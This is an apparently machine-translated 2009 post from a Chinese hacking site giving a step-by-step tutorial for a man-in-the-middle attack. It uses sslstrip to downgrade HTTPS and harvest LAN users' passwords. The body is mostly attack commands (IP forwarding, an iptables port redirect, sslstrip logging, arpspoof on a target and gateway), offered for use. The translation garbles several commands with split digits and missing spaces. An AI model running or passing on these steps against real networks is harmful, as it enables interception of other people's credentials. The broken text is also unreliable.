Hack attack:use sslstrip for MiTM attack(Bypass https)-bug warning-the black bar safety net

ID MYHACK58:62200924527
Type myhack58
Reporter 佚名
Modified 2009-09-04T00:00:00


Everyone knows, including the network for MiTM attacks can allow an attacker to more efficiently intercepted within the network the user's password and secret information. In BackTrack use EtterCap or ArpSpoof tool. But Ettercap supports the Protocol, only HTTP, FTP, Telnet, SMTP, etc. in clear text transmission Protocol effective. For HTTPS this with OpenSSL can't...... Until just in the US, held the black hat 2 0 0 9, an old release called sslstrip software, it becomes like a solution to this problem.

This software can be in(http://www.thoughtcrime.org/software/sslstrip/index.html)to find. E file ok friends can also see him in the Black hat on the wonderful speech. Due to sslstrip is a python written, don't install can also be run.

Usage is divided into the following several step:

1) with the command echo "1" > /proc/sys/net/ipv4/ip_forward will your machine into forwarding mode.

2) Use the command iptables-t nat-A PREROUTING-p tcp --destination-port 8 0-j REDIRECT --to-port 1 0 0 0 0 enable iptables to put all the http data-import sslstrip.

3) run sslstrip-a-w ssllog (written text)

4) run arpspoof-i eth0-t (target) (gateway)

Next patiently waiting! ;) To be the premise is to generate the log file as ssllog is actually in html format. With konquer can be opened, so that the link target in the look of the page surface is also clear. The above are in a LAN and BT3 under test is completed.